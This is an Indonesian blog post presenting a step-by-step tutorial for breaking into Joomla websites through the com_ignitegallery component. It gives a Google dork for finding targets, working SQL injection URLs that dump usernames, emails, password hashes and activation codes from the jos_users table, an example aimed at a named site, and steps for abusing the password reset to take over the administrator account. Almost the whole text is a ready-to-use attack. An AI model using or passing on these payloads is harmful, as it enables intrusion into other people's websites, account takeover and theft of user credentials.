TUTORIAL EXPLOIT JOMLA
- Step 1
"Exploit Joomla option=com_ignitegallery"
sedikit dr awamer
"Exploit Joomla option=com_ignitegallery"
no picture.. sorry
--first coba kita cari di google dengan dork ini
inurl:"index.php option=com_ignitegallery"
kembangin sdnri ya
- Step 2
pasang exploitnya
exploit : /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--
contoh : http://www.pulot.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users-
- ntar muncul tu 62:admini:989868wjhgd blablabla..
- second coba kita reset password nyasekarang kita reset password dengan menggunakan exploit ini :
www.site.com/index.php?option=com_user&view=reset
masukin aja email admin tadi..
- third wah minta activation pula, tenang kita cari dulu activationnya :D
exploit :
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from+jos_users-- ntar keluar aktifasi nya..
NOTE: klo aktifasi nya ada code tanda $.. berarti code aktifasi nya g bisa pke, find target lain trus masukin code aktifasi nya..
trus dia nya minta password baru.. masukin password sesuka kamu.
oke langsung ke tahap berikutnya,
sekarang kita masuk keadminnya
http://site.com/administrator/
0 komentar:
Post a Comment